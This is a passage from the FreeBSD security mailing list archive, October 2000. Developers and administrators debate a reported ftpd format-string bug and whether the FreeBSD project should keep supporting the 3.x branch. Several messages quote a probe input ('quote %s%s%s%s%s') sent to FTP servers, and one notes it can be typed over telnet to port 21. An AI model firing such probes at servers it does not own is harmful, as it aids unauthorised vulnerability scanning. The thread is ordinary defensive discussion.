Mon, 2 Oct 2000 13:01:45 -0700 (PDT) Received: from nbm by ns1.sunesi.net with local (Exim 3.03 #1) id 13gBm4-000FQv-00; Mon, 02 Oct 2000 22:01:20 +0200 Date: Mon, 2 Oct 2000 22:01:20 +0200 From: Neil Blakey-Milner To: Brett Glass Cc: Jordan Hubbard , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 Message-ID: <20001002220120.A59204@mithrandr.moria.org> References: <4.3.2.7.2.20001002113441.04932240@localhost> <59846.970514080@winston.osd.bsdi.com> <4.3.2.7.2.20001002133527.00d604a0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <4.3.2.7.2.20001002133527.00d604a0@localhost>; from brett@lariat.org on Mon, Oct 02, 2000 at 01:43:33PM -0600 Organization: Sunesi Clinical Systems X-Operating-System: FreeBSD 3.3-RELEASE i386 X-URL: http://rucus.ru.ac.za/~nbm/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon 2000-10-02 (13:43), Brett Glass wrote: > At 01:14 PM 10/2/2000, Jordan Hubbard wrote: > > >That's the client crashing, you knob. Read the advisories more closely. > >What linux ftp clients do is not all that urgent a concern of ours. > > Jordan: > > Alas, there is still reason for concern. Here's why: > > 1) At least some FreeBSD clients are also crashing in the same way as the > Linux client described in that message. They're segfaulting, which means > they could be susceptible to attacks from malicious servers. You aren't keeping your machines up to date. This was fixed in RELENG_3 already: revision 1.14.2.3 date: 2000/06/23 14:46:54; author: ru; state: Exp; lines: +3 -3 MFC: (rev 1.17) Get rid of segfault in a `site %s\' case. > 2) There is still some funkiness in recent FreeBSD servers too. This is > evidenced by the fact that bad commands can generate responses which look > like a memory dump. They also mess up the output of ps(1). See my message > a few minutes ago to Alex, which shows problems in the server when I submit > bad commands using the MS-DOS/Windows client. I don't see this with a 3.3 or 3.4 ftpd. Neil -- Neil Blakey-Milner Sunesi Clinical Systems nbm@mithrandr.moria.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 13: 8: 9 2000 Delivered-To: freebsd-security@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id 6BA4E37B503 for ; Mon, 2 Oct 2000 13:08:07 -0700 (PDT) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 13C7B1C77; Mon, 2 Oct 2000 16:08:07 -0400 (EDT) Date: Mon, 2 Oct 2000 16:08:07 -0400 From: Bill Fumerola To: John Howie Cc: James Wyatt , Poul-Henning Kamp , Brett Glass , "Chris D . Faulhaber" , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 Message-ID: <20001002160807.O38472@jade.chc-chimes.com> References: <21970.970515180@critter> <036301c02caa$ebc17300$fd01a8c0@pacbell.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <036301c02caa$ebc17300$fd01a8c0@pacbell.net>; from JHowie@msn.com on Mon, Oct 02, 2000 at 12:56:56PM -0700 X-Operating-System: FreeBSD 3.3-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Oct 02, 2000 at 12:56:56PM -0700, John Howie wrote: > > >Are you saying that if we found a terrible bug (not this easy one) > > >somewhere critical in 3.5.%d, we'd all have to immediatly upgrade? - Jy@ > > > > Yes, I am saying that. > ^^^^^^^^^^^^^^^^^^^^^ > > And this is why Linux, FreeBSD, OpenBSD, et al will NEVER beat a supported > pay-for-use Operating System like Windows in the eyes of real-world > business-critical system administrators and CIOs. Of course, all the egos, > moaning, and bitching don't help either. Thankfully, PHBs aren't a target market of FreeBSD. -- Bill Fumerola - Network Architect, BOFH / Chimes, Inc. billf@chimesnet.com / billf@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 13:30:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 4D47237B66C for ; Mon, 2 Oct 2000 13:30:08 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id OAA09105; Mon, 2 Oct 2000 14:29:40 -0600 (MDT) Message-Id: <4.3.2.7.2.20001002140904.00df5390@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 02 Oct 2000 14:29:25 -0600 To: Neil Blakey-Milner From: Brett Glass Subject: FTP problems: Clients? Servers? Both? Cc: Jordan Hubbard , security@FreeBSD.ORG In-Reply-To: <20001002220120.A59204@mithrandr.moria.org> References: <4.3.2.7.2.20001002133527.00d604a0@localhost> <4.3.2.7.2.20001002113441.04932240@localhost> <59846.970514080@winston.osd.bsdi.com> <4.3.2.7.2.20001002133527.00d604a0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 02:01 PM 10/2/2000, Neil Blakey-Milner wrote: >You aren't keeping your machines up to date. This was fixed in RELENG_3 >already: > >revision 1.14.2.3 >date: 2000/06/23 14:46:54; author: ru; state: Exp; lines: +3 -3 >MFC: (rev 1.17) Get rid of segfault in a `site %s\' case. I have machines of all ages here. Remember that we are waiting for 4.2 to upgrade some machines from 3.x. >> 2) There is still some funkiness in recent FreeBSD servers too. This is >> evidenced by the fact that bad commands can generate responses which look >> like a memory dump. They also mess up the output of ps(1). See my message >> a few minutes ago to Alex, which shows problems in the server when I submit >> bad commands using the MS-DOS/Windows client. > >I don't see this with a 3.3 or 3.4 ftpd. My latest tests seem to indicate that the MS-DOS/Windows client may not be pristine either. (It is based, as I recall, on an old Berkeley release.) It may respond in an untoward manner to sequences such as %s. So, I have dropped down to the lowest common denominator and am using Telnet to fire commands at the various ftpd versions. Based on that modus operandi, I am beginning to think that the problems are mostly in clients. But there are also some odd things in servers (including FreeBSD's). The one you point out above (only fixed recently) is a good example. I also see a few minor nits (FreeBSD's ftpd seems to give double error messages in some cases, and does not trim trailing whitespace in commands) for which I'll probably submit patches once I figure out whether there's anything exploitable in the latest servers. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 14:13:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 50D5537B502; Mon, 2 Oct 2000 14:13:26 -0700 (PDT) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id RAA75159; Mon, 2 Oct 2000 17:10:49 -0400 (EDT) (envelope-from rwatson@FreeBSD.org) Date: Mon, 2 Oct 2000 17:10:49 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Nate Williams Cc: Poul-Henning Kamp , James Wyatt , Brett Glass , "Chris D . Faulhaber" , security@FreeBSD.org, asmodai@FreeBSD.org Subject: Re: ftpd bug in FreeBSD through at least 3.4 In-Reply-To: <200010021944.NAA18121@nomad.yogotech.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 2 Oct 2000, Nate Williams wrote: > > >> >>3.4 is a dead branch, 2.x even more so. > > >> > > > >> >People are still running it 3.x, though. LOTS of people. > > >> > > >> Doesn't change the fact that it's a dead branch. > > > > > >Doesn't change the fact that "LOTS of people" are still running it... > > >Geez, what a curt, rude, throw-your-hands-up answer. > > > > > >Are you saying that if we found a terrible bug (not this easy one) > > >somewhere critical in 3.5.%d, we'd all have to immediatly upgrade? - Jy@ > > > > Yes, I am saying that. > > FWIW, I agree with Poul. We don't have the resources to support > anything but '-stable', so if have an older release and need a bug-fix, > you're forced to support yourself (ie; provide a bug-fix on your own), > or you must upgrade to the most recent '-stable' bits. I guess I have mixed feelings on both sides of the argument here: it's clearly the case that dropping support for a branch within a few months of a release on it is undesirable. However, it's also the case that resources are very constrained towards providing continuing support. It is the case that, at least for security fixes, they can and should be backported wherever feasible. Recently, Jeroen Ruigrok van der Werven has been doing some work to backport incremental improvements to the 3-STABLE branch to ensure that it at least remains usable. I think it is too early to write off 3-STABLE as there is a huge install base for the branch, and many products based on it. We don't even have a native Netscape build for 4-STABLE yet :-). I think it is fine to assert that no new feature development is occuring there, however. Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 14:25:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 3C0B437B503 for ; Mon, 2 Oct 2000 14:25:31 -0700 (PDT) Received: from bsdie.rwsystems.net([209.197.223.2]) (2472 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Mon, 2 Oct 2000 16:05:01 -0500 (CDT) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Mon, 2 Oct 2000 16:05:00 -0500 (CDT) From: James Wyatt To: Brett Glass Cc: Alex Charalabidis , "Chris D . Faulhaber" , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 In-Reply-To: <4.3.2.7.2.20001002125825.00de8f00@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=X-UNKNOWN Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 2 Oct 2000, Brett Glass wrote: > At 12:51 PM 10/2/2000, Alex Charalabidis wrote: > >Yes it does. It was posted to bugtraq as a proftpd bug on 25 Jul 00 by > >Carlos Eduardo Gorges . I confirmed the bug existed on > >our 6.00LS too (and promptly forgot :P). As far as I know, there have be= en=20 > >no exploits and it's not even a DoS since the parent process is=20 > >unaffected. The default FreeBSD ftp client crashes before the server=20 > >process does, so you can only see the problem with a client on a differe= nt > >OS (oddly enough, the MS-DOS 7 client seems to be the only one that > >creates no problems at all). >=20 > Interesting. It appears that my earlier tests were not conclusive because= =20 > there were problems in both the server AND the client. Thank you for > pointing this out! There are no survivors... (^_^) > Let's try testing the server with the MS-DOS 7 client, so that any proble= ms=20 > with the FreeBSD FTP client are not a factor. >=20 > I am now using the MS-DOS 7 client and connecting to a FreeBSD 4.1+ serve= r=20 > (running FreeBSD 4.1-20000916-STABLE). Here's what I see from the client = side: >=20 > ftp> quote %s%s%s%s%s > 500 '+H|X++_YX++|=B6QUOTE %s%s%s%s%s(null)%s%s%s%s%s': command not unders= tood. >=20 > This means that while the FreeBSD FTP client crashed (and generated the s= egfault > message), the server did not crash. However, there's still junk in the me= ssage > sent back by the server, which indicates that I may be getting at the sta= ck > here. Let me get this straight: A DOS executable survived better than a FreeBSD one? It also let you hurt the server more? Thanks for testing folks. Does everyone see the irony in this or is it just me? - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 14:38:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from winston.osd.bsdi.com (winston.osd.bsdi.com [204.216.27.229]) by hub.freebsd.org (Postfix) with ESMTP id 5157437B502 for ; Mon, 2 Oct 2000 14:38:10 -0700 (PDT) Received: from winston.osd.bsdi.com (jkh@localhost [127.0.0.1]) by winston.osd.bsdi.com (8.11.0/8.9.3) with ESMTP id e92LWFU60753; Mon, 2 Oct 2000 14:32:18 -0700 (PDT) (envelope-from jkh@winston.osd.bsdi.com) To: "John Howie" Cc: "James Wyatt" , "Poul-Henning Kamp" , "Brett Glass" , "Chris D . Faulhaber" , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 In-Reply-To: Message from "John Howie" of "Mon, 02 Oct 2000 12:56:56 PDT." <036301c02caa$ebc17300$fd01a8c0@pacbell.net> Date: Mon, 02 Oct 2000 14:32:14 -0700 Message-ID: <60749.970522334@winston.osd.bsdi.com> From: Jordan Hubbard Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > And this is why Linux, FreeBSD, OpenBSD, et al will NEVER beat a supported > pay-for-use Operating System like Windows in the eyes of real-world > business-critical system administrators and CIOs. Of course, all the egos, > moaning, and bitching don't help either. If you want to buy a support contract for older version of FreeBSD, please contact BSDi at 1-800-800-4BSD (or +1 719 457 8400 outside the USA) or, if you prefer, any of the other companies offering commercial support for *BSD which are listed in the gallery. Expecting unpaid volunteers to perform the same function as the pay-for-use operating system vendors would be so unrealistic as to border on idiocy and so I can only give you the benefit of the doubt in assuming you must have been talking about something else. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 14:39:21 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 65A6037B503; Mon, 2 Oct 2000 14:39:17 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA29594; Mon, 2 Oct 2000 14:39:17 -0700 (PDT) (envelope-from kris@FreeBSD.org) Date: Mon, 2 Oct 2000 14:39:17 -0700 From: Kris Kennaway To: Brett Glass Cc: Alex Charalabidis , "Chris D . Faulhaber" , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 Message-ID: <20001002143917.B22329@freefall.freebsd.org> References: <4.3.2.7.2.20001002123113.049344d0@localhost> <4.3.2.7.2.20001002125825.00de8f00@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5i In-Reply-To: <4.3.2.7.2.20001002125825.00de8f00@localhost>; from brett@lariat.org on Mon, Oct 02, 2000 at 01:28:39PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Oct 02, 2000 at 01:28:39PM -0600, Brett Glass wrote: > At 12:51 PM 10/2/2000, Alex Charalabidis wrote: > ftp> quote %s%s%s%s%s > 500 '+H|X++_YX++|¶QUOTE %s%s%s%s%s(null)%s%s%s%s%s': command not understood. > > This means that while the FreeBSD FTP client crashed (and generated the segfault > message), the server did not crash. However, there's still junk in the message > sent back by the server, which indicates that I may be getting at the stack > here. No, I think your client is expanding the %s locally and sending the junk to the server. Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 14:48:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 6E3E637B502 for ; Mon, 2 Oct 2000 14:48:12 -0700 (PDT) Received: from bsdie.rwsystems.net([209.197.223.2]) (2333 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Mon, 2 Oct 2000 16:30:37 -0500 (CDT) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Mon, 2 Oct 2000 16:30:36 -0500 (CDT) From: James Wyatt To: Poul-Henning Kamp Cc: Brett Glass , "Chris D . Faulhaber" , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 In-Reply-To: <21970.970515180@critter> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 2 Oct 2000, Poul-Henning Kamp wrote: > In message , Jam > es Wyatt writes: > >On Mon, 2 Oct 2000, Poul-Henning Kamp wrote: > >> In message <4.3.2.7.2.20001002124607.00df8150@localhost>, Brett Glass writes: > >> >At 12:35 PM 10/2/2000, Poul-Henning Kamp wrote: > >> > > >> >>3.4 is a dead branch, 2.x even more so. > >> > > >> >People are still running it 3.x, though. LOTS of people. > >> > >> Doesn't change the fact that it's a dead branch. > > > >Doesn't change the fact that "LOTS of people" are still running it... > >Geez, what a curt, rude, throw-your-hands-up answer. > > > >Are you saying that if we found a terrible bug (not this easy one) > >somewhere critical in 3.5.%d, we'd all have to immediatly upgrade? - Jy@ > > Yes, I am saying that. Then why is Walnut Creek CDROM still selling it as a current product? I don't see Fry's selling older copies of Windows 3.* or DOS 3/4/5, do you? I know there are two forks of FreeBSD - active and stable. That's great for making "leading-edge v.s. state-of-the-art" decisions, but even the palace at Redmond will give me free fixes for Win95 security bugs. (Some think of it as a quantity discount as bug counts go infinite, price goes to zero. (^_^) OS revisions are a fact of life, but since 4v0 was just released in April and took some time to get to 4v1 (never trust %d.0 releases), I would have expected a bit more support. Sometimes CVS isn't the answer - like the 2v2r8 release firewall one of my cheaper clients has. We are going to put a 4v1r1 box in place of it, but usually replacement is a pain. - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 15:43:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id EAA9337B503 for ; Mon, 2 Oct 2000 15:43:31 -0700 (PDT) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13gEIt-0004mp-00; Tue, 03 Oct 2000 00:43:23 +0200 Date: Tue, 3 Oct 2000 00:43:23 +0200 (IST) From: Roman Shterenzon To: John Howie Cc: security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 In-Reply-To: <60749.970522334@winston.osd.bsdi.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 2 Oct 2000, Jordan Hubbard wrote: > > And this is why Linux, FreeBSD, OpenBSD, et al will NEVER beat a supported > > pay-for-use Operating System like Windows in the eyes of real-world > > business-critical system administrators and CIOs. Of course, all the egos, > > moaning, and bitching don't help either. Just curious if msn.com stands for Microsoft Network. Oh, and by the way, Microsoft is a supported pay-for-use Operating System provider. It's the legend of bugtraq. P.S. Now, I think this thread was longer than it should have been... --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 15:46:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.rpi.edu (mail.rpi.edu [128.113.100.7]) by hub.freebsd.org (Postfix) with ESMTP id 4FBB137B502 for ; Mon, 2 Oct 2000 15:46:09 -0700 (PDT) Received: from [128.113.24.47] (gilead.acs.rpi.edu [128.113.24.47]) by mail.rpi.edu (8.9.3/8.9.3) with ESMTP id SAA415612; Mon, 2 Oct 2000 18:43:19 -0400 Mime-Version: 1.0 X-Sender: drosih@mail.rpi.edu Message-Id: In-Reply-To: References: Date: Mon, 2 Oct 2000 18:43:18 -0400 To: James Wyatt , Poul-Henning Kamp From: Garance A Drosihn Subject: Re: ftpd bug in FreeBSD through at least 3.4 Cc: Brett Glass , "Chris D . Faulhaber" , security@FreeBSD.ORG Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 4:30 PM -0500 10/2/00, James Wyatt wrote: >On Mon, 2 Oct 2000, Poul-Henning Kamp wrote: > > James Wyatt writes: > > > Are you saying that if we found a terrible bug (not this easy > > > one) somewhere critical in 3.5.%d, we'd all have to immediatly > > > upgrade? - Jy@ > > > > Yes, I am saying that. > >Then why is Walnut Creek CDROM still selling it as a current product? >I don't see Fry's selling older copies of Windows 3.* or DOS 3/4/5, >do you? > >I know there are two forks of FreeBSD - active and stable. That's >great for making "leading-edge v.s. state-of-the-art" decisions, >but even the palace at Redmond will give me free fixes for Win95 >security bugs. (Some think of it as a quantity discount as bug >counts go infinite, price goes to zero. (^_^) I am not sure why this particular teapot is seeing a tempest right now. Depending on the situation, freebsd 3.x-stable may very well see some updates. Once it sees an update, then people will have to upgrade to get that update. That may mean someone running 3.2 will suddenly have to upgrade to 3.x-stable. How do you expect updates to work, if you are not expecting to upgrade to get those updates? We are not going to release 3.2.1 to fix a bug in ftpd, just because some people might find it more convenient than having to upgrade from 3.2 to 3.5 (or whatever release we're up to there). As time goes on, it will be less and less likely that even 3.x-stable will get updates, because it will be so far behind whatever "today's stable" is. As time goes on, a fix written for "today's stable" will not even apply to 3.x-stable, which means that a DIFFERENT update will need to be written. And if it's a different update, then we need a different path to test that update out. The farther behind you are from "today's stable", the more likely that it will be too much work for the project to provide a reliable (tested) security fix to some ancient release of the system. People who really are serious about tracking security fixes should realize that they DO have to keep upgrading their OS. Discussions about "inconvenience" are silly in that context. They will find it a lot more inconvenient to be broken into. If you find that a problem, then buy a support contract. I am sure that BSDi (among others) will be just as happy to charge you for support as Microsoft has been.... Also note that Microsoft CHARGED YOU for support (directly or indirectly) when you first got the OS. That's why they might have more resources to provide support as your OS gets long in the tooth. --- Garance Alistair Drosehn = gad@eclipse.acs.rpi.edu Senior Systems Programmer or drosih@rpi.edu Rensselaer Polytechnic Institute To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 15:46:17 2000 Delivered-To: freebsd-security@freebsd.org Received: from winston.osd.bsdi.com (winston.osd.bsdi.com [204.216.27.229]) by hub.freebsd.org (Postfix) with ESMTP id 0EFB537B66E for ; Mon, 2 Oct 2000 15:46:12 -0700 (PDT) Received: from winston.osd.bsdi.com (jkh@localhost [127.0.0.1]) by winston.osd.bsdi.com (8.11.0/8.9.3) with ESMTP id e92MebU72369; Mon, 2 Oct 2000 15:40:37 -0700 (PDT) (envelope-from jkh@winston.osd.bsdi.com) To: James Wyatt Cc: Poul-Henning Kamp , Brett Glass , "Chris D . Faulhaber" , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 In-Reply-To: Message from James Wyatt of "Mon, 02 Oct 2000 16:30:36 CDT." Date: Mon, 02 Oct 2000 15:40:37 -0700 Message-ID: <72365.970526437@winston.osd.bsdi.com> From: Jordan Hubbard Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Then why is Walnut Creek CDROM still selling it as a current product? Because Walnut Creek CDROM (aka BSDI) still supports it. We don't expect the project to do that for free, of course. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 16: 7:37 2000 Delivered-To: freebsd-security@freebsd.org Received: from marius.org (marius.org [216.88.115.170]) by hub.freebsd.org (Postfix) with ESMTP id 55D5B37B503 for ; Mon, 2 Oct 2000 16:07:33 -0700 (PDT) Received: (from marius@localhost) by marius.org (8.11.0/8.11.0) id e92N71O26048; Mon, 2 Oct 2000 18:07:01 -0500 (CDT) Date: Mon, 2 Oct 2000 18:07:00 -0500 From: Marius Strom To: Jordan Hubbard Cc: Brett Glass , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 Message-ID: <20001002180700.D18840@marius.org> Mail-Followup-To: Jordan Hubbard , Brett Glass , security@FreeBSD.ORG References: <59846.970514080@winston.osd.bsdi.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <59846.970514080@winston.osd.bsdi.com>; from jkh@winston.osd.bsdi.com on Mon, Oct 02, 2000 at 12:14:40PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org And if you want more proof of this: telnet 21 Issue the commands from telnet, poof. On Mon, Oct 02, 2000 at 12:14:40PM -0700, Jordan Hubbard wrote: > > I've received LOTS of anonymous FTP login attempts on the FreeBSD boxen > > I administer, and have been wondering why. Perhaps this message explains > > it! The below works on all 2.x versions of FreeBSD, and in the 3.x branch > > up until at least 3.4-RELEASE (maybe later). > > That's the client crashing, you knob. Read the advisories more closely. > What linux ftp clients do is not all that urgent a concern of ours. > > - Jordan > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Marius Strom Professional Geek/Unix System Administrator Alpha1 Internet http://www.marius.org/marius.pgp 0x55DE53E4 Turn off the faucet? We're too busy mopping up the floor! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 16:12:30 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id EF98C37B502 for ; Mon, 2 Oct 2000 16:12:23 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e92NCLI04970; Mon, 2 Oct 2000 17:12:22 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id RAA15658; Mon, 2 Oct 2000 17:12:21 -0600 (MDT) Message-Id: <200010022312.RAA15658@harmony.village.org> To: Brett Glass Subject: Re: ftpd bug in FreeBSD through at least 3.4 Cc: Alex Charalabidis , "Chris D . Faulhaber" , security@FreeBSD.ORG In-reply-to: Your message of "Mon, 02 Oct 2000 13:28:39 MDT." <4.3.2.7.2.20001002125825.00de8f00@localhost> References: <4.3.2.7.2.20001002125825.00de8f00@localhost> <4.3.2.7.2.20001002123113.049344d0@localhost> Date: Mon, 02 Oct 2000 17:12:21 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <4.3.2.7.2.20001002125825.00de8f00@localhost> Brett Glass writes: : I am now using the MS-DOS 7 client and connecting to a FreeBSD 4.1+ server : (running FreeBSD 4.1-20000916-STABLE). Here's what I see from the client side: : : ftp> quote %s%s%s%s%s : 500 '+H|X++_YX++|¶QUOTE %s%s%s%s%s(null)%s%s%s%s%s': command not understood. I can't recreate this here with my stock 4.1 server from the stock 4.1 client. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 16:28:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 0172F37B503 for ; Mon, 2 Oct 2000 16:28:31 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e92NSSI05042; Mon, 2 Oct 2000 17:28:29 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id RAA15759; Mon, 2 Oct 2000 17:28:28 -0600 (MDT) Message-Id: <200010022328.RAA15759@harmony.village.org> To: Brett Glass Subject: Re: FTP problems: Clients? Servers? Both? Cc: Neil Blakey-Milner , Jordan Hubbard , security@FreeBSD.ORG In-reply-to: Your message of "Mon, 02 Oct 2000 14:29:25 MDT." <4.3.2.7.2.20001002140904.00df5390@localhost> References: <4.3.2.7.2.20001002140904.00df5390@localhost> <4.3.2.7.2.20001002133527.00d604a0@localhost> <4.3.2.7.2.20001002113441.04932240@localhost> <59846.970514080@winston.osd.bsdi.com> <4.3.2.7.2.20001002133527.00d604a0@localhost> Date: Mon, 02 Oct 2000 17:28:28 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <4.3.2.7.2.20001002140904.00df5390@localhost> Brett Glass writes: : Based on that modus operandi, I am beginning to think that the problems are : mostly in clients. I tested this with a 4.1.1 client against {3.2,3.3,3.4,3.5.1,4.1,4.1 stable as of July 7th, 4.1.1} and found that none of the servers were crashing at all, nor were they returning garbage. My 3.5.1 and 4.1.1 clients didn't crash when tested against a 4.1.1 server. I mean no disrespect, but I think this is a big non-issue. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 16:31:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id F189D37B66C; Mon, 2 Oct 2000 16:31:44 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e92NVhI05068; Mon, 2 Oct 2000 17:31:43 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by 